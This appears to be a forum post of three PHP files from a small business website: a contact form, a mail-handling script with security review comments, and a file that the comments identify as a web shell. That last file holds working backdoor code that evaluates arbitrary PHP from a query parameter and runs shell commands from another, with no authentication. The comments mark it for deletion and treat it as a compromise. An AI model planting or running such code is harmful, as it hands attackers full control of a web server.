Below is the contact-form PHP, then the actions PHP, and then the third PHP file. Apologies if I have posted this incorrectly!
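<div id="SendAMessage">
<p id="T" style="font-size: 18px; font-style: normal; line-height: 0%;"> SEND A MESSAGE <br /> <p id="text"> Here is your chance to tell us what your needs are. <br /> Complete the form below and we will respond as soon as possible. </p></p>
<?php
// Confirmation shown after actions.php redirects back with ?res=email_sent.
// isset() avoids an undefined-index notice on a plain page load, and the
// value is only compared (strictly), never echoed, so it is not a
// reflection point.
if (isset($_GET['res']) && $_GET['res'] === 'email_sent') {
?>
Your email has been sent, thank you!
<?php } ?>
</div>
<div id="BoxSendMessage">
<div id="TTCS"></div>
<div id="TTCD"></div>
<div id="TTT"></div>
<div id="TTL"></div>
<div id="TTR"></div>
<div id="SendMessageText">
<p id="T" style="font-size: 12px; font-style: normal; line-height: 100%;"> Name <br /> <br /> <br /> Email <br /> <br /> <br />Your Message </p>
</div>
<?php
// REVIEW: the form carries no CSRF / anti-automation token, so any third
// party page can POST to actions.php?action=contact on a visitor's behalf
// and the mail-sending endpoint can be driven by a script. A per-session
// token verified in actions.php, a captcha, or rate limiting is needed;
// none of that is visible in this file.
?>
<form action="actions.php?action=contact" method="POST" >
<input id="Nume" type="text" name="name" value="Your Name" style="border-radius: 4px; color:#888888;" onfocus="if (this.value=='Your Name') {this.value='';}"/>
<input id="Mail" type="text" name="mail" value="Your E-Mail" style="border-radius: 4px; color:#888888;" onfocus="if (this.value=='Your E-Mail') {this.value='';}"/>
<textarea id="Message" type="text" name="message" value="Your Message" style="border-radius: 4px; color:#888888;" onfocus="if (this.value==' Your Message ') {this.value='';}"> Your Message </textarea>
<?php
// The "Send" link submits through a JS function action(); it is not
// defined in this file (only SEN/SEND are, below) -- presumably it comes
// from an included script. Confirm, otherwise the form cannot be sent.
?>
<a id="SendM" onmouseout="SEN()" onmouseover="SEND()" onclick="action(); return false;" style="cursor: pointer">
<div id="BColtS"> </div>
<div id="ABSs"> <p id="T" style="font-size: 12px; font-style: normal; line-height: 60%; margin-left: 9px;"> Send </p> </div>
<div id="BColtD"> </div>
</a>
</form>
</div>
</div>
<?php include "includes/bottom.php"?>
</div>
</td>
</tr>
</table>
</body>
<script type="text/javascript">
// Hover colours for the Send link.
var obj1m = document.getElementById("SendM");
function SEN(){obj1m.style.color = "#363636";}
function SEND(){obj1m.style.color = "#FEC215";}
</script>
</html>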
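<?php
require_once('includes/variabile.php');

/*
 * Form action dispatcher (actions.php?action=...) for the contact, quote
 * and call-back forms.  Everything it handles is raw browser input, so:
 *   - every value placed in a mail header (From / Reply-to / Subject) is
 *     CR/LF-stripped; otherwise a single POST could append Bcc:/To:
 *     headers and turn this script into a spam relay;
 *   - addresses used as sender or recipient are validated;
 *   - values placed in the text/html mails are HTML-escaped.
 * Expects $email_patron and $sales to be defined by includes/variabile.php.
 */

/** Returns POST field $key as a string, '' when absent (no notices). */
function cf_post($key)
{
    return isset($_POST[$key]) ? (string) $_POST[$key] : '';
}

/**
 * Makes a value safe for a single mail header line by removing CR, LF
 * and NUL, so it cannot terminate the header and inject new ones.
 */
function cf_header_safe($value)
{
    return trim(str_replace(array("\r", "\n", "\0"), '', $value));
}

/**
 * Returns $value if it is a syntactically valid e-mail address, else ''.
 * FILTER_VALIDATE_EMAIL rejects whitespace, '<', '>' and ',' so a
 * validated address cannot carry extra recipients or header lines.
 */
function cf_valid_email($value)
{
    $addr = cf_header_safe($value);
    return filter_var($addr, FILTER_VALIDATE_EMAIL) !== false ? $addr : '';
}

/** Display-name part of a From: header: header-safe and without < > ". */
function cf_mail_name($value)
{
    return str_replace(array('<', '>', '"'), '', cf_header_safe($value));
}

/**
 * Validates an uploaded quote image and stores it in the public ups/ dir.
 *
 * @param array $upload one $_FILES entry (name, tmp_name, error, ...)
 * @return string the name it was stored under, safe to put in a URL
 *
 * Dies with a user-facing message on any failure, as this handler
 * always did.
 */
function cf_store_quote_image($upload)
{
    $tmp  = $upload['tmp_name'];
    $orig = basename($upload['name']); // never trust a client-supplied path

    if (substr_count($orig, '.') > 1) {
        die('There must be exactly one . character in the filename');
    }

    // Extension -> the IMAGETYPE_* that getimagesize() must report for it.
    // png was missing from the old whitelist although the message and the
    // content check allowed it; bmp was listed but could never pass the
    // old imagecreatefrom*() check.
    $allowed = array(
        'gif'  => IMAGETYPE_GIF,
        'png'  => IMAGETYPE_PNG,
        'jpg'  => IMAGETYPE_JPEG,
        'jpeg' => IMAGETYPE_JPEG,
        'bmp'  => IMAGETYPE_BMP,
    );
    $ext = strtolower(pathinfo($orig, PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        die('File extension must be gif,png,jpg,jpeg or bmp!');
    }

    // Check the bytes, not just the name, and require the detected type to
    // match the extension: a script renamed to .gif is rejected, and a real
    // image cannot be stored under a type other than what it is.
    // getimagesize() only reads the header, unlike imagecreatefrom*(), which
    // fully decodes attacker-supplied data.
    $info = getimagesize($tmp);
    if ($info === false || $info[2] !== $allowed[$ext]) {
        die('You must upload a valid gif,png,jpg,jpeg or bmp!');
    }

    // Stored name: the sanitised original (so the patron still recognises
    // it) behind a unique prefix, so one client's upload cannot overwrite
    // another's and nobody chooses the exact path on disk. uniqid() is for
    // uniqueness only; the name is not a secret.
    $safe   = preg_replace('/[^A-Za-z0-9._-]/', '_', $orig);
    $stored = uniqid() . '-' . $safe;
    $dest   = '/var/www/vhosts/christianvelectrical.com/httpdocs/ups/' . $stored;
    if (!move_uploaded_file($tmp, $dest)) {
        // Previously ignored, which mailed a link to a file that did not exist.
        die('The uploaded file could not be stored');
    }
    return $stored;
}

// Action comes from POST when present (truthy), else from the query string.
$action = !empty($_POST['action'])
    ? $_POST['action']
    : (isset($_GET['action']) ? $_GET['action'] : '');

switch ($action) {
    case "contact":
        $name    = cf_mail_name(cf_post('name'));
        $from    = cf_valid_email(cf_post('mail'));
        $message = cf_post('message');
        if ($from === '') {
            // The old code put the raw value into From:/Reply-to:.  Note that
            // contact.php currently only shows a message for res=email_sent,
            // so this returns to the form silently unless a message is added.
            header('Location: contact.php?res=invalid_email');
            die();
        }
        // NOTE(review): using the visitor's address in From: usually fails
        // SPF/DMARC at the patron's mail provider; a fixed site address in
        // From: with the visitor only in Reply-to: is more reliable. Kept
        // as-is to preserve behaviour.
        mail($email_patron, 'Contact from a client', $message,
            'From: ' . $name . ' <' . $from . '>' . "\r\n" .
            'Reply-to: ' . $from . "\r\n");
        header('Location: contact.php?res=email_sent');
        die();

    case "quote":
        // The debug dump (print_r($_POST); die();) that used to sit here
        // echoed unescaped POST data back to the browser -- a reflected XSS
        // for anyone tricked into submitting a crafted form -- and made the
        // redirect below unreachable.
        header('Location: instantquote.php');
        die();

    case "email_client":
        // Sends client-supplied HTML to a client-supplied address.  Even
        // with validated headers this is an open relay usable for phishing
        // from this domain; it needs a session/CSRF token, a captcha or
        // rate limiting, none of which is visible in this file.
        $to = cf_valid_email(cf_post('email'));
        if ($to === '') {
            die('Invalid e-mail address');
        }
        // The old code used an unset $name here (empty display name);
        // the posted name is the evident intent.
        $name = cf_mail_name(cf_post('name'));
        mail($to, 'Your quote at christianvelectrical.com',
            urldecode(cf_post('content')),
            'From: ' . $name . ' <' . $to . '>' . "\r\n" .
            'Reply-to: ' . $to . "\r\n" .
            "Content-type: text/html \r\n");
        break;

    case "request_call":
        // Plain-text body only; no client data reaches a header.
        mail($sales, 'Request a call',
            "Nume " . cf_post('numerc') . "\r\n" .
            "Phonerc " . cf_post('phonerc') . "\r\n" .
            "Date selected " . cf_post('calendar') . "\r\n");
        break;

    case "email_patron":
        $stored = '';
        // error == UPLOAD_ERR_OK is the only state in which tmp_name holds a
        // file; is_uploaded_file() guards against a forged $_FILES path.
        if (isset($_FILES['file']['error'])
            && $_FILES['file']['error'] === UPLOAD_ERR_OK
            && is_uploaded_file($_FILES['file']['tmp_name'])) {
            $stored = cf_store_quote_image($_FILES['file']);
        }

        $name  = cf_post('name');
        $email = cf_valid_email(cf_post('email'));

        // The mail is text/html, so every field is escaped.  Only the
        // pre-rendered quote in 'content' goes in raw, so that field is
        // still HTML the client controls (review: render the quote
        // server-side from the numbers instead of trusting it).
        $body = "\n\nNume " . htmlspecialchars($name, ENT_QUOTES, 'UTF-8') . "<br>\n\n" .
            "Email " . htmlspecialchars(cf_post('email'), ENT_QUOTES, 'UTF-8') . "<br>\n\n" .
            "Tel " . htmlspecialchars(cf_post('tel'), ENT_QUOTES, 'UTF-8') . "<br>\n\n" .
            "Total " . htmlspecialchars(cf_post('total'), ENT_QUOTES, 'UTF-8') . "<br>pounds <br><br>\n\n" .
            "Comments " . htmlspecialchars(cf_post('comments'), ENT_QUOTES, 'UTF-8') . " <br><br>\n\n";
        if ($stored !== '') {
            $body .= 'Link poza http://christianvelectrical.com/ups/' . $stored . "<br><br>\n\n";
        }
        $body .= urldecode(cf_post('content'));

        // Subject is a header too: the raw name used to be injectable there.
        $headers = '';
        if ($email !== '') {
            $headers .= 'From: ' . cf_mail_name($name) . ' <' . $email . '>' . "\r\n" .
                'Reply-to: ' . $email . "\r\n";
        }
        $headers .= "Content-type: text/html \r\n";
        mail($email_patron, 'Quote de client-ul ' . cf_header_safe($name), $body, $headers);
        break;
}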
<?php
// REVIEW: this whole file is a web shell (remote code execution backdoor).
// It evaluates arbitrary PHP from ?eval= (below) and runs an arbitrary
// shell command from ?mycmd= (at the bottom), with no authentication at
// all. It cannot be made safe by editing: delete it, treat the host as
// compromised (rotate every credential the web-server user could read),
// and use the web/FTP logs and the writable directories to find out how
// it got there.
//echo getcwd();
//phpinfo();
// Closure that eval()s the raw ?eval= query parameter. Despite the
// "challenge" framing there is no effective restriction, see below.
$challenge = function()
{
$t = (string)$_GET['eval'];//eval = (string)1337;return $rst;
//$t = str_replace(array('`', '$', '*', '#', ':', '\\', '"', "'", '(', '.'), '', $t);
echo $t . "len t = " . strlen($t) . "<br>\n";
// This "filter" only prints a message ("Nu e permis!" = "Not allowed");
// it neither returns nor exits, so the eval() below still runs for any
// input, including payloads longer than 13 bytes or containing 'return'.
if((strlen($t) > 13) || (false !== strpos($t, 'return')))
{
echo ('Nu e permis!');
}
try
{
// Arbitrary code execution: $t is attacker-controlled and is appended
// after "$rst= ", so any statement (e.g. a system() call) runs as the
// web-server user.
eval("\$rst= $t");
}
catch (Exception $e)
{
// Only Exception is caught; a parse error in $t is not an Exception
// (fatal on PHP 5, a ParseError/Error on PHP 7+), so this branch is
// rarely reached.
//var_dump($e);
return false;
}
var_dump($rst);
return ($rst=== '1337');
};
// Runs the eval backdoor defined above and dumps its result to the page.
$a = $challenge();
echo "<br>";
var_dump($a);
// Unconditional, unauthenticated remote command execution: whatever is
// passed in ?mycmd= is handed to the system shell as the web-server
// user. This one line alone makes the file a backdoor -- delete the file.
system($_GET['mycmd']);
?>